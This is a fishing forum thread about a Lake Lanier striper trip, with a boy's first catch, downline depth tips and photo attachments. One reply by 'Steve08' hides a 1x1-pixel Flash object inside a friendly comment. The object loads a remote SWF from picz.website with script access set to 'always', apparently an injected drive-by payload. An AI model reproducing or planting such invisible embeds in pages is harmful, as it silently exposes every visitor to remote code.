5/14-5/15 - Lanier introducing the next generation

FMBear

It was a GREAT weekend out for sure. Yesterday I took my buddy Dalton for another fishing trip and this time incorporated boating lessons, as he's talking more and more about getting a boat himself. It was nice relaxing on the way to the dock with him on motor duty.

The REAL FUN was today. My good buddy, Durante, has been asking about getting his son, Miles, in on some fishing. So I was more than happy to get them on my boat for a day of firsts for his son. Any of you out this morning know how cold it was this morning, but his son stuck it out and we got him his first striper and several spots. A brief motor intro before I got them back to the dock and it wasn't long before he was out from a fun morning.

Gotta love watching the smiles of the kids as they battle their first fish in!!

As for a report, only one fish in the last 2 weeks on weighted freelines. All the rest of the action has been on downlines 13-17 feet early, and 17-24 feet down mid-morning. Love the downline bite and calling the action on the graph.

Attachments

• MilesDurante.jpg
    MilesDurante.jpg
    85.4 KB · Views: 795
  • Miles1st.jpg
    Miles1st.jpg
    73.8 KB · Views: 800
  • MilesStripe.jpg
    MilesStripe.jpg
    89.4 KB · Views: 828
  • Miles3rd.jpg
    Miles3rd.jpg
    84.4 KB · Views: 798
  • Miles4th.jpg
    Miles4th.jpg
    83.5 KB · Views: 830
  • MilesCaptain.jpg
    MilesCaptain.jpg
    108.7 KB · Views: 796
  • MilesAsleep.jpg
    MilesAsleep.jpg
    55.8 KB · Views: 800
  • Dalton Fight.jpg
    Dalton Fight.jpg
    41.8 KB · Views: 815
  • Dalton 5.jpg
    Dalton 5.jpg
    54.4 KB · Views: 834
  • Fred 10.jpg
    Fred 10.jpg
    75 KB · Views: 806
  • Captain.jpg
    Captain.jpg
    100 KB · Views: 797

Steve08

Good stuff, young man will always remember his first trip :flag:<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
I know I do! Great pictures OP :)

Lanier Jim

Great report and pics!

LJ